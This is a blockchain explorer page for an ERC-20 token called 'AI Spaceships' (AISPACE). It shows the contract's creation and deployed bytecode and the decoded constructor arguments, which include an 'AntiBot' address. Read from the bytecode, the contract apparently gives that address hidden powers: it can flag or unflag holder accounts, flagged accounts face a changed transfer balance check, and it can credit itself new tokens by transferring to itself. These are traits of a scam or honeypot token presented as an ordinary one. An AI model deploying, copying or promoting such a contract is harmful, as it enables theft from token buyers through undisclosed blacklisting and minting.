80fd5b610b1284610aae565b9250610b2060208501610aae565b9150604084013590509250925092565b600060208284031215610b4257600080fd5b610a4d82610aae565b60008060408385031215610b5e57600080fd5b610b6783610aae565b9150610b7560208401610aae565b90509250929050565b600181811c90821680610b9257607f821691505b602082108103610bb257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561031957610319610bb8565b8181038181111561031957610319610bb856fea264697066735822122015034391467ef53e2dc56759473f71f94eea364bae28fbaddd70d0fbea7ccc9164736f6c63430008130033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000652b26bba3b0d1d33c0fa7fb06ebcc70f5e298a9000000000000000000000000000000000000000000000000000000000000000d414920537061636573686970730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074149535041434500000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d714610214578063a9059cbb14610227578063b1a4e0dc1461023a578063dd62ed3e1461024d578063f2fde38b1461026057600080fd5b8063715018a6146101d65780638da5cb5b146101de57806395d89b41146101f957806396bfcd231461020157600080fd5b8063313ce567116100de578063313ce5671461017657806339509351146101855780635c68e5f71461019857806370a08231146101ad57600080fd5b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015157806323b872dd14610163575b600080fd5b610118610273565b6040516101259190610a60565b60405180910390f35b61014161013c366004610aca565b610305565b6040519015158152602001610125565b6006545b604051908152602001610125565b610141610171366004610af4565b61031f565b60405160128152602001610125565b610141610193366004610aca565b610343565b6101ab6101a6366004610b30565b610365565b005b6101556101bb366004610b30565b6001600160a01b031660009081526001602052604090205490565b6101ab61039d565b6000546040516001600160a01b039091168152602001610125565b6101186103b1565b6101ab61020f366004610b30565b6103c0565b610141610222366004610aca565b6103fa565b610141610235366004610aca565b61047a565b610141610248366004610b30565b610493565b61015561025b366004610b4b565b6104d1565b6101ab61026e366004610b30565b6104fc565b60606007805461028290610b7e565b80601f01602080910402602001604051908101604052809291908181526020018280546102ae90610b7e565b80156102fb5780601f106102d0576101008083540402835291602001916102fb565b820191906000526020600020905b8154815290600101906020018083116102de57829003601f168201915b5050505050905090565b600033610313818585610572565b60019150505b92915050565b60003361032d858285610696565b610338858585610710565b506001949350505050565b60003361031381858561035683836104d1565b6103609190610bce565b610572565b600954336001600160a01b039091160361039a576001600160a01b0381166000908152600360205260409020805460ff191690555b50565b6103a5610926565b6103af6000610980565b565b60606008805461028290610b7e565b600954336001600160a01b039091160361039a576001600160a01b0381166000908152600360205260409020805460ff1916600117905550565b6000338161040882866104d1565b90508381101561046d5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6103388286868403610572565b6000336104888185856109d0565b610313818585610710565b600954600090336001600160a01b03909116036104c957506001600160a01b031660009081526003602052604090205460ff1690565b506000919050565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b610504610926565b6001600160a01b0381166105695760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610464565b61039a81610980565b6001600160a01b0383166105d45760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610464565b6001600160a01b0382166106355760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610464565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006106a284846104d1565b9050600019811461070a57818110156106fd5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610464565b61070a8484848403610572565b50505050565b6001600160a01b0383166107745760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610464565b6001600160a01b0382166107d65760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610464565b6001600160a01b03831660009081526001602090815260408083205460039092529091205460ff161561082c576006546001600160a01b0385166000908152600160205260409020546108299190610be1565b90505b8181101561088b5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610464565b6108958183610a41565b6001600160a01b0380861660009081526001602052604080822093909355908516815220546108c49083610a54565b6001600160a01b0380851660008181526001602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109189086815260200190565b60405180910390a350505050565b6000546001600160a01b031633146103af5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610464565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6009546001600160a01b0384811691161480156109fa57506009546001600160a01b038381169116145b15610a3c576001600160a01b038316600090815260016020526040902054610a229082610a54565b6001600160a01b0384166000908152600160205260409020555b505050565b6000610a4d8284610be1565b9392505050565b6000610a4d8284610bce565b600060208083528351808285015260005b81811015610a8d57858101830151858201604001528201610a71565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610ac557600080fd5b919050565b60008060408385031215610add57600080fd5b610ae683610aae565b946020939093013593505050565b600080600060608486031215610b0957600080fd5b610b1284610aae565b9250610b2060208501610aae565b9150604084013590509250925092565b600060208284031215610b4257600080fd5b610a4d82610aae565b60008060408385031215610b5e57600080fd5b610b6783610aae565b9150610b7560208401610aae565b90509250929050565b600181811c90821680610b9257607f821691505b602082108103610bb257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561031957610319610bb8565b8181038181111561031957610319610bb856fea264697066735822122015034391467ef53e2dc56759473f71f94eea364bae28fbaddd70d0fbea7ccc9164736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000652b26bba3b0d1d33c0fa7fb06ebcc70f5e298a9000000000000000000000000000000000000000000000000000000000000000d414920537061636573686970730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074149535041434500000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): AI Spaceships
Arg [1] : symbol_ (string): AISPACE
Arg [2] : AntiBot (address): 0x652B26bBa3B0D1d33c0FA7FB06ebCc70f5e298a9

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000652b26bba3b0d1d33c0fa7fb06ebcc70f5e298a9
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000d
Arg [4] : 4149205370616365736869707300000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [6] : 4149535041434500000000000000000000000000000000000000000000000000


Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.